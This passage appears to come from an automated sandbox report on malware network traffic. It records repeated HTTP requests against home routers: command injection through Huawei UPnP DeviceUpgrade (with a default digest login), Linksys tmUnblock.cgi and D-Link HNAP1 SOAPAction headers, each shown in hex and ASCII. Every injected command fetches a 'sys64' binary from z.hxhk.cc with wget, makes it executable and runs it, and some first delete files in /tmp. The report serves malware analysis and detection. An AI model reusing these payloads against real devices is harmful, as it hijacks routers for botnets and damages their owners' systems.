63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
